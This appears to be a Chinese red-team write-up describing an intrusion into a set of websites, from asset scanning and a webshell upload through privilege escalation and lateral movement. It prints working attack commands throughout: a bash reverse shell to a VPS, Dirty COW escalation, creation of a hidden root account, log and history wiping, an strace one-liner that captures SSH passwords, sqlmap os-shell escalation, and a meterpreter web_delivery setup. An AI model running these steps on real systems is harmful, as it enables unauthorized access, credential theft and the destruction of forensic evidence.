红队实战攻击之随缘测站(上)
2020-10-28 18:24:01 Author: www.secpulse.com(查看原文) 阅读量:324 收藏

这是 酒仙桥六号部队 的第 96 篇文章。

全文共计2872个字,预计阅读时长10分钟

序言

大家好,作为一个练习时长两年半的安全实习生,这几天大佬给了我一批网站让我练练手。跟着大佬的步骤慢慢学习,争取早日出道,呸呸,口误,早日成为大佬!

正文

随缘搜集资产

大佬们都是0day、社工、钓鱼之类的,本人菜鸟一只,勿喷,看到一大堆资产,本着随缘的标准,开始了一系列的批量操作。

首先开始资产搜集,ip和域名信息都已经有了,这里我将所有的ip放到goby。(附上官网地址https://gobies.org/)

这是一个资产管理软件,能自动扫描端口以及识别指纹信息,漏洞扫描,密码爆破等等,还可以加载一些小插件,还是挺强的。为提高效率,这里只探测一些关键性端口。

同时将域名放到sql批量注入工具里面,加上一些简单的注入绕过,有条件的可以加上代理池。

探测完毕,因为给的目标站点不算少,其中肯定会触发到一些防护软件的拦截规则,刚好能帮我们过滤掉一部分难啃的站点,所以能检测到的相对来说会好利用一点(俗话说的好,柿子还是得挑软的来捏嘛)。

根据扫描出来的结果,将探测到的21,22,3389和数据库的端口分别整合一下,加载字典爆破一波。还看到有struts2框架,上struts2poc扫一波。做完以上的操作之后,都没有测出漏洞,不要气馁,这种情况很正常,要是漏洞这么容易找到,那就没什么成就感了。

下面就开始测web,点开web检测,可以查看已扫描到的全部资产,点链接符号即可跳到网站,一个一个进行测试。

再用fofa的浏览器插件,探测一下旁站资产。接下来的事,就是找后台,找注册登陆点,密码爆破,注入,框架漏洞等等。主站不行就去旁站再相同的操作做一遍。(现在网上有批量注入,批量找后台,批量爆破后台口令的一些脚本,但是每个网站的复杂程度都不一样,所以到这一步还是手工靠谱)。

经过漫长的重复操作,找到一个供应商注册登陆的,这种接口一般是要人工审核的,但是秉着不能放过任何一个小细节的心态,还是先注册试试,诶嘿,自动登录,有点意思~

进到后台,有两个上传点,都测一下,祭出burp大杀器!!!

改一下包,果不其然,没有限制,没有一点点防备,也没有一丝顾虑,你就这样出现~

把数据包返回的路径复制下来,冰蝎连接成功。

好了,外网拿shell基本上就这样了,只要有耐心,总能找得到,拿到shell的这一刻,一切的疲惫都随着多巴胺的传递烟消云散~

认认真真的维持据点

言归正传,先看一下权限,查看权限为www,权限有点小。

uname -a查看一下版本号,大于2.6.22,可以试试脏牛提权。

不知道是不是我冰蝎问题,输入命令老是卡死,先做个反弹吧。

Vps监听一下  :nc -lvvp 8080

被控制的主机:bash -i >& /dev/tcp/vps的ip地址/8080 0>&1

反弹成功之后,在冰蝎里上传脏牛提权工具。

./dirty password

等了差不多3分钟,出现下图的内容之后即提权成功,拿着账号密码去登陆即可。

账号:firefart

密码:password

登陆之后不要急,先隐藏一下自己的操作,禁止history记录我的输入的命令。

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0

将备份的/tmp/passwd.bak,替换/etc/passwd。还原root账号。

看了下shadow里root账号的密码,没有解出来,那就创建一个root权限的账号吧。

useradd -p “密码” db -o -u 0 -g root

Cat /etc/passwd查看一下,新建成功。

用db账号登陆,whoami查看下权限。

对了,忘记看了w查看一下当前登陆用户,发现没有其他人在线。

last查看登陆记录,发现管理员这几天都有登陆过。

清理一波日志先。

echo ""> /var/log/wtmp  清空登陆日志
echo ""> /var/log/btmp  清空登陆失败日志
echo ""> ~/.bash_history 清除history日志

突然断开连接。

隐藏自己的登陆信息连ssh上去再看看,发现是管理员上线了,先战术性撤退。

ssh -T [email protected] /bin/bash -i

小心翼翼的横向拓展

账号没有被删,还好,做一下痕迹清理还是很有必要的。0v0俗话说的好,来都来了,不做点啥,那都对不起管理员对我们的信任,那就先接个代理吧。

正向代理试了一下,端口连接不上,看来是被防火墙给拦了,试试反向连接。用了ew,不是很稳定,数据传输大一点就会断,还是用frp吧,顺便用内置的stcp模块加密一下流量。

上传frp到控制机:

scp C:tools4.端口代理frpfrp_0.33.0_linux_amd64.tar.gz [email protected]:/tmp

vps上配置完服务端frps.ini后启用 nohup ./frps -c frps.ini &

控制端上配置客户端frpc.ini后,nohup ./frpc -c frpc.ini &

本机配置 ./frps -c frps.ini

接入goby,挂上代理,一键扫描内网网段,探测出来的漏洞不是很多,探测资产还是很强的!

顺便监听一下ssh,等管理员上线就能抓到他的密码。

strace -xx -fp `cat /var/run/sshd.pid` 2>&1| grep --line-buffered -P 'write(d, "\x00' | perl -lne '$|++; @F=/"s*([^"]+)s*"/g;for (@F){tr/\x//d}; print for @F'|grep --line-buffered -oP '.{8}K([2-7][0-9a-f])*$'|grep --line-buffered -v '^64$'|perl -pe 's/([0-9a-f]{2})/chr hex $1/gie'

资产探测的差不多了,漏洞扫描的还差了点,开了不少445端口,直接用msf扫一下ms17-010试试。如下图,这就是最初向往的黑阔感jio叭。

好吧,一个都没有,ms12-020和ms17-010也没打成功......以前看各位大佬的文章进内网rdp和smb漏洞就是一把梭,差点怀疑是我msf的问题,结果在他服务器上装了个msf还是一样的,放弃了,并没有那么简单,得换个思路。

翻一翻密码,thinkphp的框架,太多配置文件了,翻到吐,找到一个config,里面还是空的,不过看到了命名规则, grep -ri "DB_USER" 找到了数据库的账号。

查看这个路径,好的,获取到管理员明文账号密码(非root账号)。

连接成功。

能看到其他的数据库,权限很大,读一波密码,拿到了几个账号密码包括root密码,去解一下密,成功!

把获取到的账号密码加载进去去撞库试试,拿到了一台主机(另一个就是我已经拿到的主机),到goby里面看了下资产,是台windows 的主机,很幸福~

一键连接root,看到里面有域名和账号密码,是个oa系统,东西还挺多的。

然后网站挂了。。等到晚上终于可以连了,不过代理出问题了,整了半天,原来是自己的vpn出问题了,换了个节点之后,frp连接socks5成功。继续早上拿到的账号密码,mysql一键连接数据库。

python sqlmap.py -d mysql://root:#[email protected]:3306/mysql --os-shell

(此命令会自动udf提权)

执行这条命令需要先安装两个插件。

pip install PyMySQL

pip instal sqlalchemy

拿到os-shell之后,执行命令。喵喵喵?(心态炸裂)

然后多按了几次回车键,连接次数过多,ip被锁定了,好的,这条路断了- -

所以做渗透的心态得好...不说了,去楼梯口冷静冷静先。

再次查看一下ssh监听,管理员也一直没有上线,行叭行叭,管理员不管我,那我继续回到goby查看下内网的网站,挨个试试web端,许久之后...

功夫不负有心人,admin/123456进去了一个虚拟化系统,显示有21台计算机。赚了,弱口令大法好!

Msf生成反弹windows的powershell。

use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.xx.xx
set lport 5101
set srvport 5202
set uripath /
run

然后...没有弹回来,未完待续...

总结

利用goby搜集资产信息,利用工具筛选出脆弱资产。拿到权限先隐藏踪迹,维持权限,再清理一些操作记录。想办法在主机搜集账号密码,资产等信息。linux可以尝试抓取ssh信息。然后再看看内网的资产,拿搜集到的账号密码去爆破,不然未授权漏洞,提权漏洞,exp,web漏洞等等。好了,不说了,我去买包辣条压压惊,等我打下来再出后续。

本文作者:酒仙桥六号部队

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/144753.html


文章来源: https://www.secpulse.com/archives/144753.html
如有侵权请联系:admin#unsafe.sh